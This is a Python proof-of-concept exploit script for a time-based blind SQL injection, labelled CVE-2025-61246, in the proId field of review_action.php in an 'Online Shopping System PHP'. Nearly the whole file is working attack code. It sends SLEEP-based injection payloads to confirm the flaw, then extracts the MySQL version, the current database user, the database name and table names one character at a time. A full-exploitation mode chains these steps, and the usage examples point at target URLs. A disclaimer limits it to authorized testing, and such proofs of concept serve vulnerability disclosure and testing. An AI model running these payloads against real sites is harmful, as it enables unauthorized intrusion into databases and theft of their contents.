#!/usr/bin/env python3
"""
CVE-2025-61246 - SQL Injection PoC Exploit
Author: Govind Pratap Singh
Description: Automated exploitation tool for time-based blind SQL injection
             in Online Shopping System PHP - review_action.php endpoint

For authorized security testing only.
"""

import argparse
import string
import sys
import time
from urllib.parse import urlparse

import requests
from colorama import Fore, Style, init

# Initialize colorama
init(autoreset=True)


class SQLInjectionExploit:
    """Time-based blind SQL injection tester for the ``proId`` POST field.

    Every probe is a POST to ``target_url`` whose ``proId`` value embeds a
    conditional ``SLEEP(timeout)``. A probe counts as "true" when the
    response takes at least ``timeout - 1`` seconds.
    """

    def __init__(self, target_url, timeout=5, proxy=None, verbose=False):
        """Store settings and create the HTTP session.

        Args:
            target_url: URL that receives the POST requests.
            timeout: Seconds passed to ``SLEEP()`` in the payloads. The HTTP
                request timeout is ``timeout + 10``.
            proxy: Optional proxy URL used for both http and https.
            verbose: When true, log each payload and its response time.
        """
        self.target_url = target_url
        self.timeout = timeout
        self.proxy = {"http": proxy, "https": proxy} if proxy else None
        self.verbose = verbose
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })

    def log(self, message, level="info"):
        """Print a colored ``[LEVEL] message`` line; unknown levels are white."""
        colors = {
            "info": Fore.CYAN,
            "success": Fore.GREEN,
            "warning": Fore.YELLOW,
            "error": Fore.RED,
            "progress": Fore.MAGENTA
        }
        print(f"{colors.get(level, Fore.WHITE)}[{level.upper()}] {message}{Style.RESET_ALL}")

    def send_payload(self, payload):
        """POST ``payload`` as ``proId`` and measure the response time.

        Returns:
            ``(elapsed_seconds, response)`` on success.
            ``(timeout + 10, None)`` when the request times out, so callers
            treat a timed-out request as a delayed response.
            ``(0, None)`` on any other error, so callers treat it as no delay.
        """
        data = {"proId": payload}

        try:
            # Monotonic clock: wall-clock adjustments must not skew the
            # measured delay that every decision in this tool is based on.
            start_time = time.monotonic()
            response = self.session.post(
                self.target_url,
                data=data,
                timeout=self.timeout + 10,
                proxies=self.proxy,
                verify=False
            )
            elapsed_time = time.monotonic() - start_time

            if self.verbose:
                self.log(f"Payload: {payload[:50]}... | Response Time: {elapsed_time:.2f}s", "progress")

            return elapsed_time, response
        except requests.exceptions.Timeout:
            self.log("Request timeout - possible SQL injection confirmed", "warning")
            return self.timeout + 10, None
        except Exception as e:
            self.log(f"Error sending payload: {str(e)}", "error")
            return 0, None

    def _delay_observed(self, payload):
        """Send ``payload`` and report whether the response was delayed.

        One second of slack below ``self.timeout`` is allowed.
        """
        elapsed_time, _ = self.send_payload(payload)
        return elapsed_time >= self.timeout - 1

    def detect_vulnerability(self):
        """Compare a baseline request with a SLEEP payload.

        Returns:
            True when the SLEEP request is slower than the baseline by at
            least ``timeout - 1`` seconds, otherwise False.
        """
        self.log("Starting vulnerability detection...", "info")

        # Baseline request
        baseline_time, _ = self.send_payload("1")

        # Time-based payload; the delay is self.timeout seconds
        sqli_payload = f"1' AND (SELECT 1 FROM (SELECT(SLEEP({self.timeout})))a)-- -"
        sqli_time, _ = self.send_payload(sqli_payload)

        # Check if there's a significant time difference
        if sqli_time - baseline_time >= self.timeout - 1:
            self.log("✓ Target is VULNERABLE to SQL Injection!", "success")
            self.log(f"  Baseline: {baseline_time:.2f}s | SQLi: {sqli_time:.2f}s", "success")
            return True

        self.log("✗ Target does not appear vulnerable", "warning")
        self.log(f"  Baseline: {baseline_time:.2f}s | SQLi: {sqli_time:.2f}s", "info")
        return False

    def extract_database_name(self):
        """Recover ``DATABASE()`` one character at a time.

        Returns:
            The recovered name, or None when no length in 1..49 matched.
            A position whose character is not in the charset is skipped.
        """
        self.log("Extracting database name...", "info")

        db_name = ""
        charset = string.ascii_lowercase + string.digits + "_"

        # First, get the length of database name
        for length in range(1, 50):
            payload = f"1' AND IF(LENGTH(DATABASE())={length}, SLEEP({self.timeout}), 0)-- -"
            if self._delay_observed(payload):
                self.log(f"Database name length: {length}", "success")
                break
        else:
            self.log("Could not determine database name length", "error")
            return None

        # Extract each character
        for position in range(1, length + 1):
            for char in charset:
                payload = f"1' AND IF(SUBSTRING(DATABASE(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
                if self._delay_observed(payload):
                    db_name += char
                    self.log(f"Database name: {db_name}", "progress")
                    break

        self.log(f"✓ Database name extracted: {db_name}", "success")
        return db_name

    def extract_mysql_version(self):
        """Recover the leading digits-and-dots part of ``VERSION()``.

        Stops at the first position (of at most 19) where no charset
        character matches.

        Returns:
            The recovered version string (possibly empty).
        """
        self.log("Extracting MySQL version...", "info")

        version = ""
        charset = string.digits + "."

        for position in range(1, 20):
            found = False
            for char in charset:
                payload = f"1' AND IF(SUBSTRING(VERSION(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
                if self._delay_observed(payload):
                    version += char
                    self.log(f"MySQL Version: {version}", "progress")
                    found = True
                    break

            if not found:
                break

        self.log(f"✓ MySQL version: {version}", "success")
        return version

    def extract_current_user(self):
        """Recover ``USER()`` one character at a time.

        Returns:
            The recovered user string, or None when no length in 1..99
            matched. A position whose character is not in the charset is
            skipped.
        """
        self.log("Extracting current database user...", "info")

        user = ""
        charset = string.ascii_lowercase + string.digits + "@._-"

        # Get length
        for length in range(1, 100):
            payload = f"1' AND IF(LENGTH(USER())={length}, SLEEP({self.timeout}), 0)-- -"
            if self._delay_observed(payload):
                self.log(f"User length: {length}", "success")
                break
        else:
            self.log("Could not determine user length", "error")
            return None

        # Extract each character
        for position in range(1, length + 1):
            for char in charset:
                payload = f"1' AND IF(SUBSTRING(USER(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
                if self._delay_observed(payload):
                    user += char
                    self.log(f"Current user: {user}", "progress")
                    break

        self.log(f"✓ Current user: {user}", "success")
        return user

    def count_tables(self):
        """Count the tables in the current database.

        Returns:
            The first count in 1..99 that triggers the delay, else None.
        """
        self.log("Counting tables in database...", "info")

        for count in range(1, 100):
            payload = f"1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())={count}, SLEEP({self.timeout}), 0)-- -"
            if self._delay_observed(payload):
                self.log(f"✓ Number of tables: {count}", "success")
                return count

        self.log("Could not determine table count", "error")
        return None

    def extract_table_names(self, limit=5):
        """Recover up to ``limit`` table names from the current database.

        Stops at the first table index whose name length (1..49) cannot be
        determined.

        Returns:
            A list of the non-empty names recovered.
        """
        self.log(f"Extracting table names (limit: {limit})...", "info")

        tables = []
        charset = string.ascii_lowercase + string.digits + "_"

        for table_index in range(limit):
            table_name = ""

            # Get table name length
            for length in range(1, 50):
                payload = f"1' AND IF(LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {table_index},1))={length}, SLEEP({self.timeout}), 0)-- -"
                if self._delay_observed(payload):
                    break
            else:
                break  # No more tables

            # Extract each character
            for position in range(1, length + 1):
                for char in charset:
                    payload = f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {table_index},1),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
                    if self._delay_observed(payload):
                        table_name += char
                        self.log(f"Table {table_index + 1}: {table_name}", "progress")
                        break

            if table_name:
                tables.append(table_name)
                self.log(f"✓ Table extracted: {table_name}", "success")

        return tables

    def full_exploitation(self):
        """Run detection, then every extraction step, then print a summary."""
        self.log("=" * 60, "info")
        self.log("CVE-2025-61246 - Full Exploitation Mode", "info")
        self.log("=" * 60, "info")

        if not self.detect_vulnerability():
            self.log("Target is not vulnerable. Exiting.", "error")
            return

        print()

        # Extract information
        mysql_version = self.extract_mysql_version()
        print()

        current_user = self.extract_current_user()
        print()

        db_name = self.extract_database_name()
        print()

        table_count = self.count_tables()
        print()

        # Bound up front: the summary below reads `tables` even when the
        # table count could not be determined.
        tables = []
        if table_count and table_count > 0:
            tables = self.extract_table_names(min(3, table_count))
            print()

        self.log("=" * 60, "info")
        self.log("Exploitation Summary", "success")
        self.log("=" * 60, "info")
        self.log(f"MySQL Version: {mysql_version}", "info")
        self.log(f"Current User: {current_user}", "info")
        self.log(f"Database Name: {db_name}", "info")
        self.log(f"Table Count: {table_count}", "info")
        if tables:
            self.log(f"Sample Tables: {', '.join(tables)}", "info")
        self.log("=" * 60, "info")


def print_banner():
    """Print the boxed tool banner in red."""
    inner_width = 59
    rows = [
        "",
        "CVE-2025-61246 SQL Injection PoC",
        "Online Shopping System PHP - Exploit Tool",
        "",
        "Discovered by: Govind Pratap Singh",
        "",
    ]
    top = "╔" + "═" * inner_width + "╗"
    bottom = "╚" + "═" * inner_width + "╝"
    body = [f"║{row.center(inner_width)}║" for row in rows]
    box = "\n".join("    " + line for line in [top, *body, bottom])
    print(f"\n{Fore.RED}{box}{Style.RESET_ALL}\n")


def main():
    """Parse command-line arguments, validate them, and run the chosen mode."""
    print_banner()

    parser = argparse.ArgumentParser(
        description="CVE-2025-61246 SQL Injection Exploitation Tool",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python exploit.py --url http://target.com/review_action.php --detect-only
  python exploit.py --url http://target.com/review_action.php --extract-db
  python exploit.py --url http://target.com/review_action.php --full-exploit
  python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
        """
    )

    parser.add_argument("-u", "--url", required=True, help="Target URL (review_action.php endpoint)")
    parser.add_argument("-d", "--detect-only", action="store_true", help="Only detect vulnerability")
    parser.add_argument("-e", "--extract-db", action="store_true", help="Extract database name")
    parser.add_argument("-f", "--full-exploit", action="store_true", help="Full exploitation mode")
    parser.add_argument("-t", "--timeout", type=int, default=5, help="SQL delay timeout (default: 5)")
    parser.add_argument("-p", "--proxy", help="Proxy URL (e.g., http://127.0.0.1:8080)")
    parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")

    args = parser.parse_args()

    # The delay threshold is `timeout - 1`; below 2 it is non-positive and
    # every response would be classified as delayed.
    if args.timeout < 2:
        parser.error("--timeout must be at least 2 seconds")

    # Validate URL
    try:
        result = urlparse(args.url)
    except ValueError:
        print(f"{Fore.RED}[ERROR] Invalid URL{Style.RESET_ALL}")
        sys.exit(1)
    # Only http/https can be sent by the session; any other scheme would
    # fail inside send_payload and be misreported as "not vulnerable".
    if result.scheme not in ("http", "https") or not result.netloc:
        print(f"{Fore.RED}[ERROR] Invalid URL format{Style.RESET_ALL}")
        sys.exit(1)

    # Initialize exploit
    exploit = SQLInjectionExploit(
        target_url=args.url,
        timeout=args.timeout,
        proxy=args.proxy,
        verbose=args.verbose
    )

    # Execute based on arguments
    if args.detect_only:
        exploit.detect_vulnerability()
    elif args.extract_db:
        if exploit.detect_vulnerability():
            print()
            exploit.extract_database_name()
    elif args.full_exploit:
        exploit.full_exploitation()
    else:
        # Default: detection only
        exploit.detect_vulnerability()

    print()
    print(f"{Fore.YELLOW}[WARNING] This tool is for authorized testing only!{Style.RESET_ALL}")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n{Fore.YELLOW}[!] Interrupted by user{Style.RESET_ALL}")
        sys.exit(0)
    except Exception as e:
        print(f"{Fore.RED}[ERROR] {str(e)}{Style.RESET_ALL}")
        sys.exit(1)